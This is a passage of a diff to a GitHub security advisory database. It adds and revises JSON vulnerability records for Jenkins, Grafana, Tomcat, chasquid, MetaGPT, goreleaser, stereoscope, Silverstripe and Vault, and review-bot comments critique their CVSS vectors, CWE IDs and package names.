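Review bot: The package is keyed as `github.com/etcd-io/etcd`, but that is the repository URL, not, as far as I know, a Go module path anyone imports: 3.3.x code imports `github.com/coreos/etcd` and 3.4.x imports `go.etcd.io/etcd`, so an import-path matcher will miss both affected lines. Suggest splitting `affected` by module path — `github.com/coreos/etcd` for the `0`→`3.3.23` range and `go.etcd.io/etcd` for `3.4.0-rc.0`→`3.4.10` — after checking go.mod at the two referenced fix commits. The `Specific Go Package Affected` line in details (`github.com/etcd-io/etcd/pkg/fileutil`) would then be corrected to match.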
@@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cjgm-9vc9-56mx", - "modified": "2024-01-24T21:48:53Z", + "modified": "2024-01-31T20:23:24Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23900" ], "summary": "Path traversal vulnerability in Jenkins Matrix Project Plugin", - "details": "Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers.", + "details": "Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects submitted through the `config.xml` REST API endpoint.\n\nThis allows attackers with Item/Configure permission to create or replace any `config.xml` file on the Jenkins controller file system with content not controllable by the attackers.\n\nMatrix Project Plugin 822.824.v14451b_c0fd42 sanitizes user-defined axis names of Multi-configuration project.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-cmq2-j8v8-2q44/GHSA-cmq2-j8v8-2q44.json b/advisories/github-reviewed/2024/01/GHSA-cmq2-j8v8-2q44/GHSA-cmq2-j8v8-2q44.json new file mode 100644 index 0000000000000..6ebefdf16d6e0 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-cmq2-j8v8-2q44/GHSA-cmq2-j8v8-2q44.json 
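Review bot: The added vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L` sets UI:R, but the rewritten details describe an attacker with Item/Configure permission submitting the axis name directly through the `config.xml` REST API, which needs no action from another user; UI:N matches the text, i.e. `"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"`. If UI:R was carried over from the upstream Jenkins rating, one sentence in details saying what interaction is required would remove the apparent contradiction. `database_specific.severity` is outside this hunk, so check it still agrees with whichever vector is kept.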
@@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmq2-j8v8-2q44", + "modified": "2024-01-30T23:47:48Z", + "published": "2024-01-30T23:47:48Z", + "aliases": [ + "CVE-2018-18623" + ], + "summary": "Grafana XSS in Dashboard Text Panel", + "details": "Grafana 5.3.1 has XSS via the \"Dashboard > Text Panel\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.0.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18623" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/issues/15293" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/issues/4117" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/11813" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/14984" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/releases/tag/v6.0.0" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200608-0008/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:47:48Z", + "nvd_published_at": "2020-06-02T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json b/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json new file mode 100644 index 0000000000000..9ee5c736553e4 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json 
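Review bot: The `fixed` event is `6.0.0-beta1`, but the only release reference in the hunk is the v6.0.0 tag and the fix PR is #14984, so please confirm the beta actually contains that PR before every 6.0.0 pre-release is treated as patched; if that cannot be confirmed, `"fixed": "6.0.0"` is the safer bound. The details mention only `Grafana 5.3.1` while the range starts at `0`, and since this is an incomplete fix for CVE-2018-12099, operators would benefit from an explicit sentence that versions already carrying that earlier fix (5.2.x/5.3.x) remain affected.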
@@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f4qf-m5gf-8jm8", + "modified": "2024-02-01T21:03:23Z", + "published": "2024-01-19T12:30:18Z", + "aliases": [ + "CVE-2024-21733" + ], + "summary": "Apache Tomcat vulnerable to Generation of Error Message Containing Sensitive Information", + "details": "Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.5.7" + }, + { + "fixed": "8.5.64" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0-M11" + }, + { + "fixed": "9.0.44" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21733" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/tomcat" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176951/Apache-Tomcat-8.5.63-9.0.43-HTTP-Response-Smuggling.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/19/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:43Z", + "nvd_published_at": "2024-01-19T11:15:08Z" + } +} \ No newline at end of file 
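Review bot: Only `org.apache.tomcat:tomcat` is listed under `affected`, but that aggregate artifact is rarely what applications depend on; most consumers pull `org.apache.tomcat.embed:tomcat-embed-core` (e.g. via Spring Boot) or `org.apache.tomcat:tomcat-coyote`, so dependency scanners will miss nearly all embedded deployments. Consider adding those artifacts with the same `8.5.7`–`8.5.64` and `9.0.0-M11`–`9.0.44` ranges, assuming the defect lives in the connector code shipped in those jars. The packetstorm reference is titled "HTTP Response Smuggling" while the summary and CWE-209 say "error message containing sensitive information"; one sentence in details stating what is leaked and to whom would reconcile the two for anyone triaging this.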
diff --git a/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json b/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json index 0eb09f663b242..72de112e4f9ae 100644 --- a/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json +++ b/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f67f-2j6r-m4c9", - "modified": "2024-01-24T21:50:51Z", + "modified": "2024-01-31T20:24:55Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23903" ], "summary": "Non-constant time webhook token comparison in Jenkins GitLab Branch Source Plugin ", - "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.", + "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier does not use a constant-time comparison function when checking whether the provided and expected webhook token are equal.\n\nThis could potentially allow attackers to use statistical methods to obtain a valid webhook token.\n\nGitLab Branch Source Plugin 688.v5fa_356ee8520 uses a constant-time comparison function when validating the webhook token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } ], "affected": [ { @@ -56,7 +59,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-697" ], "severity": "LOW", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json b/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json index 9d0296d7c385c..c8294ea579f50 100644 --- a/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json 
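Review bot: The second hunk fills `cwe_ids` with `CWE-697` (Incorrect Comparison), but the defect described is a non-constant-time token comparison, whose specific weakness is CWE-208 (Observable Timing Discrepancy); I'd use `"CWE-208"`, or list both as `"CWE-208", "CWE-697"`, so this entry groups with the other timing-side-channel advisories. The rest of the edit (vector `AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N`, LOW) is consistent with the statistical-attack wording in details.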
+++ b/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fh38-9fgr-454w", - "modified": "2024-01-22T21:32:16Z", + "modified": "2024-01-29T16:25:12Z", "published": "2024-01-21T06:30:22Z", "aliases": [ "CVE-2024-23725" @@ -9,7 +9,10 @@ "summary": "Cross-site Scripting in Ghost", "details": "Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json b/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json index 1b753584ced86..e1f1a4cbc065d 100644 --- a/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json +++ b/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-frxm-v7q3-v2wv", - "modified": "2024-01-26T19:58:42Z", + "modified": "2024-01-29T03:15:54Z", "published": "2024-01-20T00:30:27Z", "aliases": [ "CVE-2024-23686" @@ -86,6 +86,10 @@ "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qqhq-8r2c-c3f5" }, + { + "type": "PACKAGE", + "url": "https://github.com/jeremylong/DependencyCheck" + }, { "type": "WEB", "url": "https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5" diff --git a/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json b/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json index 2d8ba188d30cf..1f52901814989 100644 --- a/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json +++ b/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json 
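Review bot: The added vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` uses PR:N, yet the details say the payload arrives via a post excerpt, which as far as I know is set by an authenticated author/contributor through Ghost's admin interface; unless there is an unauthenticated path to set excerpts, PR:L (`AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N`) better reflects the attack. Please confirm against the upstream fix and adjust `database_specific.severity` (outside this hunk) if the score changes.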
@@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fw9h-cxx9-gfq3", - "modified": "2024-01-24T21:49:51Z", + "modified": "2024-01-31T20:24:13Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23901" ], "summary": "Shared projects are unconditionally discovered by Jenkins GitLab Branch Source Plugin", - "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group.", + "details": "GitLab allows sharing a project with another group.\n\nJenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group.\n\nThis allows attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins after the next scan of the group’s projects.\n\nIn GitLab Branch Source Plugin 688.v5fa_356ee8520, the default strategy for discovering projects does not discover projects shared with the configured owner group. To discover projects shared with the configured owner group, use the new trait \"Discover shared projects\".", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json b/advisories/github-reviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json new file mode 100644 index 0000000000000..0e7a22ca2b2b9 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json 
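Review bot: The new last paragraph presents the `Discover shared projects` trait as the way to restore the old behaviour, but does not say that enabling it re-opens exactly the attack described above (anyone who can share a project into the owner group gets a Pipeline built); I'd add `Enable this trait only for groups whose sharing you control, as it restores discovery of externally shared projects.` It is also not stated whether projects that were already discovered before upgrading to 688.v5fa_356ee8520 disappear on the next scan or must be removed by hand; spelling that out matters for anyone cleaning up after a suspected abuse. Finally, the vector's PR:N refers to Jenkins privileges while the attacker still needs a GitLab account able to share into the group, which a short clause in details could make explicit.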
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4x3-mfpj-f335", + "modified": "2024-01-29T22:29:06Z", + "published": "2024-01-22T06:30:32Z", + "aliases": [ + "CVE-2023-52354" + ], + "summary": "chasquid HTTP Request/Response Smuggling vulnerability", + "details": "chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/albertito/chasquid" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52354" + }, + { + "type": "WEB", + "url": "https://github.com/albertito/chasquid/issues/47" + }, + { + "type": "WEB", + "url": "https://github.com/albertito/chasquid/commit/a996106eeebe81a292ecba838c7503cac7493e74" + }, + { + "type": "WEB", + "url": "https://blitiri.com.ar/p/chasquid/relnotes/#113-2023-12-24" + }, + { + "type": "PACKAGE", + "url": "https://github.com/albertito/chasquid" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-444" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:29:06Z", + "nvd_published_at": "2024-01-22T06:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json b/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json index 2f86992d7c2f9..bd061825930b2 100644 --- a/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json +++ b/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json 
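Review bot: The `summary` says `HTTP Request/Response Smuggling`, apparently lifted from the CWE-444 title, but the details concern SMTP: chasquid accepts bare-LF line terminators, which is what enables SMTP smuggling; rename it to `"summary": "chasquid vulnerable to SMTP smuggling (accepts LF-terminated lines)"` so searches and triage do not file this as a web issue. One sentence in details on the consequence (the usual SMTP-smuggling outcome: an attacker appends a second message, with a sender of their choosing, that chasquid and the relaying server delimit differently) would also justify the I:H in the vector for readers.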
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g7ph-8423-pf4j", - "modified": "2024-01-22T21:20:11Z", + "modified": "2024-01-29T19:11:15Z", "published": "2024-01-22T03:30:26Z", "aliases": [ "CVE-2024-23750" @@ -9,7 +9,10 @@ "summary": "Code execution in metagpt", "details": "MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -52,7 +55,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-94" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-h3q2-8whx-c29h/GHSA-h3q2-8whx-c29h.json b/advisories/github-reviewed/2024/01/GHSA-h3q2-8whx-c29h/GHSA-h3q2-8whx-c29h.json new file mode 100644 index 0000000000000..7a6a2664d4a46 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-h3q2-8whx-c29h/GHSA-h3q2-8whx-c29h.json 
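Review bot: The second hunk sets `cwe_ids` to `CWE-94`, but the details describe shell metacharacters reaching `subprocess.Popen`, which is OS command injection, CWE-78; I'd list `"CWE-78"` (optionally alongside CWE-94). In the vector, PR:L suggests a low-privileged MetaGPT user, whereas `QaEngineer` is an agent role whose input is LLM-generated from the task and code it is given; a sentence in details saying who controls the injected string (the person submitting the task, or content the agent reads) would make PR and AV easier to judge.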
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3q2-8whx-c29h", + "modified": "2024-01-30T20:57:52Z", + "published": "2024-01-30T20:57:52Z", + "aliases": [ + "CVE-2024-23840" + ], + "summary": "`goreleaser release --debug` shows secrets", + "details": "### Summary\nHello 👋 \n\n`goreleaser release --debug` log shows secret values used in the in the custom publisher.\n\n\nHow to reproduce the issue:\n\n- Define a custom publisher as the one below. Make sure to provide a custom script to the `cmd` field and to provide a secret to `env` \n\n```\n#.goreleaser.yml \npublishers:\n - name: my-publisher\n # IDs of the artifacts we want to sign\n ids:\n - linux_archives\n - linux_package\n cmd: \"./build/package/linux_notarize.sh\"\n env:\n - VERSION={{ .Version }}\n - SECRET_1={{.Env.SECRET_1}}\n - SECRET_2={{.Env.SECRET_2}}\n```\n\n- run `goreleaser release --debug`\n\nYou should see your secret value in the gorelease log. The log shows also the `GITHUB_TOKEN`\n\nExample:\n\n```\nrunning cmd= ....\nSECRET_1=secret_value\n```\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/goreleaser/goreleaser" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.23.0" + }, + { + "fixed": "1.24.0" + } + ] + } + ], + "versions": [ + "1.23.0" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/goreleaser/goreleaser/security/advisories/GHSA-h3q2-8whx-c29h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23840" + }, + { + "type": "WEB", + "url": "https://github.com/goreleaser/goreleaser/commit/d5b6a533ca1dc3366983d5d31ee2d2b6232b83c0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/goreleaser/goreleaser" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": true, + 
"github_reviewed_at": "2024-01-30T20:57:52Z", + "nvd_published_at": "2024-01-30T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-hpxr-w9w7-g4gv/GHSA-hpxr-w9w7-g4gv.json b/advisories/github-reviewed/2024/01/GHSA-hpxr-w9w7-g4gv/GHSA-hpxr-w9w7-g4gv.json new file mode 100644 index 0000000000000..eb1a0cfbc56c5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-hpxr-w9w7-g4gv/GHSA-hpxr-w9w7-g4gv.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpxr-w9w7-g4gv", + "modified": "2024-01-31T22:39:17Z", + "published": "2024-01-31T22:39:17Z", + "aliases": [ + "CVE-2024-24579" + ], + "summary": "stereoscope vulnerable to tar path traversal when processing OCI tar archives", + "details": "### Impact\nIt is possible to craft an OCI tar archive that, when stereoscope attempts to unarchive the contents, will result in writing to paths outside of the unarchive temporary directory. Specifically, use of `github.com/anchore/stereoscope/pkg/file.UntarToDirectory()` function, the `github.com/anchore/stereoscope/pkg/image/oci.TarballImageProvider` struct, or the higher level `github.com/anchore/stereoscope/pkg/image.Image.Read()` function express this vulnerability.\n\n### Patches\nPatched in v0.0.1\n\n### Workarounds\nIf you are using the OCI archive as input into stereoscope then you can switch to using an [OCI layout](https://github.com/opencontainers/image-spec/blob/main/image-layout.md) by unarchiving the tar archive and provide the unarchived directory to stereoscope.\n\n### References\n- Patch PR https://github.com/anchore/stereoscope/pull/214", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/anchore/stereoscope" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/anchore/stereoscope/security/advisories/GHSA-hpxr-w9w7-g4gv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24579" + }, + { + "type": "WEB", + "url": "https://github.com/anchore/stereoscope/commit/09dacab4d9ee65ee8bc7af8ebf4aa7b5aaa36204" + }, + { + "type": "PACKAGE", + "url": "https://github.com/anchore/stereoscope" + } + ], + "database_specific": { + "cwe_ids": [ + 
"CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:39:17Z", + "nvd_published_at": "2024-01-31T17:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json b/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json index fe8879695604c..4a242b8bb5aba 100644 --- a/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json +++ b/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json 
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-j3m6-gvm8-mhvw", - "modified": "2024-01-23T20:09:52Z", + "modified": "2024-01-29T14:21:39Z", "published": "2024-01-23T20:09:52Z", "aliases": [ "CVE-2023-49783" ], "summary": "No permission checks for editing/deleting records with CSV import form", - "details": "### Impact\nUsers who don't have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions.\n\nThe likelyhood of a user having create permissions but _not_ having edit or delete permissions is low, but it _is_ possible.\n\nNote that this doesn't affect any `ModelAdmin` which has had the import form disabled via the [`showImportForm` public property](https://api.silverstripe.org/4/SilverStripe/Admin/ModelAdmin.html#property_showImportForm), nor does it impact the `SecurityAdmin` section.\n\n#### Action may be required\n\nIf you have a custom implementation of [`BulkLoader`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html), you should update your implementation to respect permissions when the return value of [`getCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_getCheckPermissions) is true.\n\nIf you are using any `BulkLoader` in your own project logic, or maintain a module which uses it, you should consider passing `true` to [`setCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_setCheckPermissions) if the data is provided by users.\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-49783\n", + "details": "### Impact\nUsers who don't have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions.\n\nThe likelyhood of a user having create permissions but _not_ having edit or delete permissions is low, but it _is_ 
possible.\n\nNote that this doesn't affect any `ModelAdmin` which has had the import form disabled via the [`showImportForm` public property](https://api.silverstripe.org/4/SilverStripe/Admin/ModelAdmin.html#property_showImportForm), nor does it impact the `SecurityAdmin` section.\n\n#### Action may be required\n\nIf you have a custom implementation of [`BulkLoader`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html), you should update your implementation to respect permissions when the return value of [`getCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_getCheckPermissions) is true.\n\nIf you are using any `BulkLoader` in your own project logic, or maintain a module which uses it, you should consider passing `true` to [`setCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_setCheckPermissions) if the data is provided by users.\n\n**Base CVSS:** [4.3](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C&version=3.1)\n**Reported by:** Guy Sartorelli from Silverstripe\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-49783\n", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/01/GHSA-j6vv-vv26-rh7c/GHSA-j6vv-vv26-rh7c.json b/advisories/github-reviewed/2024/01/GHSA-j6vv-vv26-rh7c/GHSA-j6vv-vv26-rh7c.json new file mode 100644 index 0000000000000..8ddcb3ee66469 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-j6vv-vv26-rh7c/GHSA-j6vv-vv26-rh7c.json 
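Review bot: The new-side `details` still carry the misspelling `likelyhood` (`The likelyhood of a user having create permissions`); since this hunk already rewrites the text, fix it to `likelihood`. The added `**Base CVSS:** [4.3](…)` link embeds temporal metrics (`E:F/RL:O/RC:C`), so the calculator it opens will show a lower temporal score than the 4.3 quoted as "Base"; linking the base vector only, or labelling the number accordingly, avoids that confusion.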
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6vv-vv26-rh7c", + "modified": "2024-01-30T23:40:40Z", + "published": "2024-01-30T23:40:40Z", + "aliases": [ + "CVE-2020-10661" + ], + "summary": "HashiCorp Vault Improper Privilege Management", + "details": "HashiCorp Vault and Vault Enterprise versions 0.11.0 through 1.3.3 may, under certain circumstances, have existing nested-path policies grant access to Namespaces created after-the-fact. Fixed in 1.3.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.0" + }, + { + "fixed": "1.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10661" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/commit/18485ee9d4352ac8e8396c580b5941ccf8e5b31a" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#134-march-19th-2020" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/vault/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:40:40Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json b/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json index d1873270ee800..14b0c70f56835 100644 --- a/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json 